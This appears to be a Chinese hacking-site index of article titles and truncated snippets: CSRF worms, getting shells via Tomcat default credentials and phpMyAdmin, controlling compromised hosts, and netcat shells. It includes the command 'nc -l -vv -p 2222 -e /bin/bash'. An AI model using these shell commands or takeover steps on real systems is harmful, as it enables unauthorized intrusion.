|=——————————————————————=| |=————–=< CSRF攻击原理解析 >=——————=| |=——————————————————————=| |=——————-=< By...
百度Hi Csrf蠕虫攻击
漏洞起因:百度是国内最大的中文搜索引擎。同时百度也提供了百度空间、百度贴吧等BLOG社区服务,拥有海量的用户群,号称全球最大中文社区。80sec发现过百度产品一系列的安全漏洞,其中一些问题得到了有效的...
Tomcat后台拿shell
有些Tomcat安装之后没有修改默认密码(用户名admin,密码为空),这样就可以直接登录进去。 有两个目录可以访问: /admin /manager/html /admin 目录下的利用: Serv...
教你phpMyAdmin 后台拿webshell
1.如何拿到登陆密码,自己想办法。 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径. 3.选择一个Database....
最受黑客喜欢的五种网络口令
现在企业大部分的网络设备与应用软件,都是依靠口令来保证其安全性的。若口令丢失的话,可想而知,会给企业的网络安全带来多大的风险,很可能在不知不觉中,企业网络中的主机成为了黑客的肉鸡,成为他们攻击其他网络...
教你如何在远程3389终端主机上直接Copy文件
很多朋友登上3389肉鸡上的时后.因为下载木马或文件经常是个头疼的问题 有些朋友利用主页来下载,也就是说用3389肉鸡的IE下载木马来运行呵呵~如果本地管理员是个高度傻瓜那没话说,如果是中度傻瓜的话,...
介绍黑客入侵Windows XP的常用方法
第一招、屏幕保护 在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就...
知识科普
Unicode的消息介绍(图)
基本知识 字节和字符的区别 Big Endian和Little Endian UCS-2和UCS-4 UTF-16和UTF-32 UTF-16 UTF-32 UTF-8 基本知识 介绍Unicode之...
网络安全
Unix系统NC反弹shell的方法
NC的原生做法: nc -l -vv -p 2222 -e /bin/bash无法使用NC反弹的时候可以这样 先在tmp创建一个普通管道mknod /tmp/backpipe p或者mkfifo /t...
sqlmap用户手册[续篇]
ps:其实看到zone里很多问sqlmap的问题在通读看完那篇文章后都能解决。可惜啊,现在的人通读看文章的耐心都没有了,遇到了哪个问题就想起针对这个问题求助,却不知道仔细看完之后,以后可以省多少时间来...
